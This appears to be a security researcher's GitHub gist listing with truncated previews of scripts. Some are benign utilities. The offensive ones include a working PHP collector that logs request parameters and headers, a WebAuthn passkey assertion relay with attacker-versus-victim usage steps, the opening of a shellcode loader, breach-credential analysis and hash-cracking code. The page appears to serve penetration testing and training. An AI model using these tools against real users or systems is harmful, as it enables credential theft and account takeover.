Joshua Wright joswr1ght
joswr1ght
/ network_activity.py
Created
October 17, 2025 17:34
Generate a visual of network activity using Matplotlib
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # /// script | |
| # dependencies = [ | |
| # "matplotlib", | |
| # "numpy", | |
| # ] | |
| # /// | |
| """ | |
| =============================================== | |
| Network Activity Timeline from CSV Data |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <?php | |
| file_put_contents("cookies.log", json_encode(array( | |
| "GET"=>$_GET, | |
| "POST"=>$_POST, | |
| "headers"=>getallheaders()))."\n", | |
| FILE_APPEND); | |
| ?> | |
| </html> |
joswr1ght
/ webauthn-assertion-relay.js
Created
August 25, 2025 17:59
Relay WebAuthn/Passkey Helper Code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * WebAuthn Assertion Relay Helper | |
| * | |
| * Usage: | |
| * 1. From your attacker session at https://target-rp.tgt/login, | |
| * capture the "publicKey" JSON challenge the RP sends. | |
| * 2. Send that JSON blob (as text) to the victim browser console as publicKeyJSON. | |
| * 3. Paste this helper, then call: getAssertion(publicKeyJSON). | |
| * 4. Copy the printed output (JSON with base64url fields) back | |
| * to your attacker machine. |
joswr1ght
/ gist:cf8283844e644faee1f53d33a220e842
Last active
August 4, 2025 18:09
ClickHouse Analysis of Repeated Usernames with Password Disclosure from COMB List
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ``` | |
| ### Create a table to store breach credentials with support for statistical sampling | |
| Mac.localdomain :) CREATE TABLE credentials ( | |
| username String, | |
| password String | |
| ) ENGINE = MergeTree() | |
| ORDER BY (username, cityHash64(username)) | |
| SAMPLE BY cityHash64(username); | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| I'm sorry to say that Callie Sparkes is not a real person. | |
| Also, she has a terrible password. | |
| Headshot by thispersondoesnotexist.com. | |
| For getting to this page though, I will impart some wisdom that may be useful for the CTF. | |
| A common persistence mechanism on Windows is to deploy a service that runs a process automatically. | |
| You can use `Get-Service` from PowerShell to get a list of services. | |
| Alternatively, you can run `sc query` to list services from a Command Prompt. |
joswr1ght
/ InstallUtil-ShellCode.cs
Created
April 15, 2024 13:04
InstallUtil-ShellCode.cs - Originally from subTee with Minor Comments Changes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
| Minor cleanup and clarity changes by Joshua Wright <[email protected]> @joswr1ght | |
| */ | |
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; |
joswr1ght
/ nltk-patch.py
Created
March 13, 2024 17:25
Resolve NLTK utlopen error to work in offline mode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # NLTK makes the assumption that users are online when importing the library. | |
| # This is partly to automate the download or corpus files and other aassets, | |
| # but if those files already exist then offline mode is problematic. `import nltk` | |
| # will still work, but it takes a while to timeout, producing errors: | |
| # | |
| # [nltk_data] Error loading averaged_perceptron_tagger: <urlopen error | |
| # [nltk_data] [Errno -3] Temporary failure in name resolution> | |
| # [nltk_data] Error loading punkt: <urlopen error [Errno -3] Temporary | |
| # [nltk_data] failure in name resolution> | |
| # [nltk_data] Error loading stopwords: <urlopen error [Errno -3] |
joswr1ght
/ searchpackage.py
Created
August 2, 2023 11:24
Search Ranges.io Package for Keyword, Display Matching Group and Short Title
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import json | |
| import sys | |
| if (len(sys.argv) != 3): | |
| sys.stderr.write('Search RIO Package for string, identify matching group' | |
| ' and short title\n') | |
| sys.stderr.write(f'Usage: {sys.argv[0]} package_export.json "keyword"\n') | |
| sys.exit(0) |
joswr1ght
/ lm2ntcrack.py
Created
June 8, 2023 19:55
Using a NT hash and a cracked LANMAN password, brute-force all possible capitalization permutations to find the correct NT hash password
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Most of this code is from @clr2of8's Domain Password Audit Tool: | |
| # https://github.com/clr2of8/DPAT | |
| import hashlib | |
| import os | |
| import sys | |
| import textwrap | |
| def wrap(body): |
joswr1ght
/ Copy-RemoteWindowsEventLogs.ps1
Last active
October 22, 2025 14:18
PowerShell script to copy event logs from one or more remote systems to the local file system
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://chat.openai.com/share/6d96527b-288d-45a9-8eb4-e8b43d52486a | |
| # Input parameters | |
| param ( | |
| [Parameter(Mandatory=$true)] | |
| [string]$inputFile, | |
| [Parameter(Mandatory=$true)] | |
| [System.Management.Automation.PSCredential]$Credential | |
| ) |
NewerOlder